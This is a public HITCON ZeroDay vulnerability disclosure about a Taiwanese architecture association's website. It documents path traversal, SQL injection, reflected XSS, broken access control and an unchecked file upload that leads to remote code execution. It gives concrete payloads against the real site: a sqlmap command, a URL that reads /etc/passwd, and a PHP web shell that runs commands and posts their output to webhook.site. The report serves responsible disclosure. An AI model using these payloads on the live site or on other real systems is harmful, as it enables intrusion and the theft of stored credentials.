Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2024-01619
- 發信 Vendor: 台灣建築美學文化經濟協會
- Title: 台灣建築美學文化經濟協會 任意檔案下載、SQLi、SQL錯誤訊息RXSS、存取控制缺陷、任意檔案上傳導致RCE、錯誤頁面無限加載有Dos風險、CKFinder未關閉
- Introduction: 任意檔案下載、SQLi、SQL錯誤訊息RXSS、存取控制缺陷、任意檔案上傳導致RCE、錯誤頁面無限加載有Dos風險、CKFinder未關閉
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2024/12/31 18:41:16 : 新提交 (由 萌新 更新此狀態)
- 2024/12/31 18:42:59 : 新提交 (由 萌新 更新此狀態)
- 2025/01/03 16:54:52 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 11:48:58 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 11:48:58 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 11:48:58 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/03/16 03:00:17 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2024-01619
- 通報者:nhd1261 (萌新)
- 風險:嚴重
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
相關網址
https://www.aace.com.tw/eventread.php?nid=c1f21e&&event_hot=38
https://www.aace.com.tw/eventread.php?nid=c1f21e'%20ORDER%20BY%20<script>alert('XSS');</script>&&event_hot=38
https://www.aace.com.tw/mail.php
https://www.aace.com.tw/member/memberlogin_verlist.php?pageNum_aacemember=64
https://www.aace.com.tw/error.php
https://www.aace.com.tw/ckfinder/ckfinder.html
https://www.aace.com.tw/info.php
敘述
任意檔案下載:
透過修改nid參數與目錄遍歷可下載任意檔案。
https://www.aace.com.tw//download2.php?nid=../../../../../etc/passwd
SQLi:
nid參數添加單引號報錯,SQLmap測試成功注入,並發現管理員帳密、會員帳密等明文儲存。
Payload:
python sqlmap.py "https://www.aace.com.tw/eventread.php?nid=06eb71&&event_hot=37" --random-agent --batch --dbms mysql --dbs
RXSS:
SQL錯誤訊息可直接渲染,造成RXSS。
Payload:
https://www.aace.com.tw/eventread.php?nid=c1f21e'%20ORDER%20BY%20<script>alert('XSS');</script>&&event_hot=38
存取控制缺陷:
尋找後台時發現訪問mail.php時會直接跳轉到管理頁面,不須登入的情況就具有完全的管理員權限,進一步測試發現只要知道後台網址,就能在不登入的情況進入後台。
https://www.aace.com.tw/mail.php
https://www.aace.com.tw/member/memberlogin_verlist.php?pageNum_aacemember=64
任意檔案上傳導致RCE:
後台上傳功能完全未檢查檔案,可以直接上傳shell,雖然禁用了exec等直接執行系統命令的函數,但還是有很多其他能執行命令的函數可用,以下是使用pcntl_exec撰寫的一個反彈shell,上傳此shell後訪問檔案位置,即可執行命令,並在webhook接收結果。
<?php
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'whoami; id; uname -a';
//下方webhook.site需更改為自己的url
pcntl_exec("/bin/bash", array('-c', "result=\$($cmd); curl -X POST -d \"data=\$result\" https://webhook.site/"));
?>發現一個error.php,若是直接訪問會無限加載,可能造成Dos。
https://www.aace.com.tw/error.php
發現phpinfo洩漏。
https://www.aace.com.tw/info.php
發現ckfinder未關閉。
https://www.aace.com.tw/ckfinder/ckfinder.html